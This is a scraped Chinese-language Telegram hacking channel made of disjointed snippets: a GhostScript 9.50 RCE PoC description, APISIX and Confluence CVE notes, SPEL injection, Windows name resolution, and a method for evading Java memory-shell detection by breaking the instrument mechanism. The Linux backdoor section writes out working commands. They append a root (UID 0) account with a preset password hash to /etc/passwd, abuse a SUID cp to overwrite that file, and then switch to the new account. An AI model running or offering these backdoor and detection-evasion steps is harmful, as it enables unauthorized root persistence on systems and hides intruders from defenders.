黑客网站入侵 编程 搭建 渗透 破解
3.6K subscribers
419 photos
13 links
Download Telegram
在这个利用链中,如果单单修复GhostScript的话,还是有一定DoS的风险,因为Ghostscript没有对资源做限制,可以进行DoS攻击。


执行一次即可跑满一个cpu核心,多执行几次最终可以把所有cpu跑满,在一定的场景是有风险的(比如文章ImageMagick使用场景),不过官方不认为是安全漏洞
通过遵循调用层次结构,最终会到达 Brettle.Web.NeatUpload.UploadHttpModule.Init(HttpApplication),这是 System.Web.IHttpModule 的初始化方法
CVE-2021-43557:Apache APISIX:request_uri 变量中的路径遍历

为什么$request_uri?这个变量在身份验证和授权插件中用得很多。它没有被规范化,因此有可能绕过一些限制。

Apache APISIX 中没有典型的外部身份验证/授权功能。您可以编写自己的插件,但这相当复杂。为了证明 APISIX 容易受到路径遍历攻击,我将使用uri-blocker插件。我怀疑其他插件也容易受到攻击,但这个插件很容易使用。

设置舞台
将 APISIX 安装到 Kubernetes 中。使用0.7.2版本的 helm chart

Apache APISIX 存在路径遍历漏洞。该漏洞不会影响任何外部身份验证,但会影响使用ctx.var.request_uri变量的插件。
windows 名称解析机制

解析顺序
Windows 2K , XP , 2K3
DNS -> NetBIOS
Windows Vista 之后
DNS -> LLMNR -> NetBIOS

0x01 DNS协议
DNS客户端和DNS服务器共同为计算机和用户提供计算机名称到IP地址映射的名称解析服务。DNS协议支持IPV4和IPV6,DNS协议实现名称解析的过程中,在客户端没有任何本地的数据库文件,所监听的端口UDP/53。DNS数据包的组成

DNS的名称解析过程:

读取本机 DNS 缓存(本机 hosts 文件内容)
如果缓存中没有,则会请求网络配置中配置的 DNS 服务器
如果 DNS 服务器未作出响应,则请求失败。反之,DNS 服务器则会处理用户请求。
RCE-0-day-for-GhostScript-9.50
hostScript 9.50 RCE 0-day 的 PoC - Payload 生成器
当利用 GhostScript 9.50 的 0-day 漏洞时,python 中的 PoC 会生成有效载荷。此 0-day 漏洞利用 Ubuntu 存储库中的默认设置影响 ImageMagick(在 Ubuntu 20.04 上使用 ImageMagick 的默认设置进行测试)
该项目仅用于教育目的,不得用于违法或谋取私利。


注意到 php-imagemagick,有时你必须找到正确的fd/<number>。做这些事情最简单的方法是模糊逻辑和类似的东西(使用 Ubuntu 20.04 和默认安装的 php-imagemagick 进行测试)
运行eventvwr
通过WIN+R键调出运行界面后,在界面中执行eventvwr,可打开windows日志管理器,选择安全项即可查看windows系统安全日志
SPEL 表达式注入漏洞深入分析

SPEL(Spring Expression Language),即Spring表达式语言,是比JSP的EL更强大的一种表达式语言。从Spring 3开始引入了Spring表达式语言,它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中,在这个过程中所使用的表达式会在运行时计算得到值。使用SPEL你可以实现超乎想象的装配效果,这是其他装配技术很难做到的。

通过接口的使用情况
linux常见backdoor及排查技术
常见技巧
添加root权限后门用户
/etc/passwd这个文件包含了系统所有的用户名、ID、登录的shell等信息,这个文件是以分号分隔开的,依次是登录名、密码、用户ID、组ID,用户名、用户的根目录以及登录的shell,其中密码处可以是x(代表加密,存放在/etc/shadow文件中),也可以直接是加密后的密文,此外用户uid为0代表用户会是root的权限,这个时候我们的目标就是在这个文件中追加一条,一个带有密文且id为0的账号。
关于密码加密我们可以使用下面的命令
#密码M0rk
xxx@ubuntu:~/Desktop$ perl -e 'print crypt("M0rk", "AA"). "\n"'
AAhmo1jgYI0HE
所以我们最终想要在passwd文件中的条目是这个样子的
backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash
append the backdoor to passwd file
echo "backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash">>/etc/passwd
这里还有个知识点-有时候可以使用suid程序(find / perm /4000)cp命令覆盖/etc/passwd 来进行提权,比如
cd /tmp
echo "backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash">>passwd
cp passwd /etc/passwd
echo M0rk|su - backdoor -c 'cat /flag'
[CVE-2021-26085] Confluence /s/路径的信息泄露(受限)

漏洞描述

未经认证的攻击者可访问Confluence的WEB-INF和META-INF目录下的任意文件(包括可能的凭据信息)。这个漏洞我理解是CVE-2020-29448补丁的绕过;跟CVE-2019-3394的危害程度一样,最大可能的危害是读取可能存在的atlassian-user.xml文件(泄露LDAP凭据但这种配置方式已被弃用),但是不需要认证。
漏洞详情

/s/路径是Atlassian产品通用的访问静态资源的方法。
Golang 的字符编码与 regexp

最近在使用 Golang 的 regexp 对网络流量做正则匹配时,发现有些情况无法正确进行匹配,找到资料发现 regexp 内部以 UTF-8 编码的方式来处理正则表达式,而网络流量是字节序列,由其中的非 UTF-8 字符造成的问题。

我们这里从 Golang 的字符编码和 regexp 处理机制开始学习和分析问题,并寻找一个有效且比较通用的解决方法,本文对此进行记录。
既然通过instrument机制能检测到Agent型内存马,那我们怎么样才能避免被检测到呢?答案比较简单,也比较粗暴,那就是把instrument机制破坏掉。这也是在冰蝎3.0中内存马防检测机制的实现原理,检测软件无法attach,自然也就无法检测。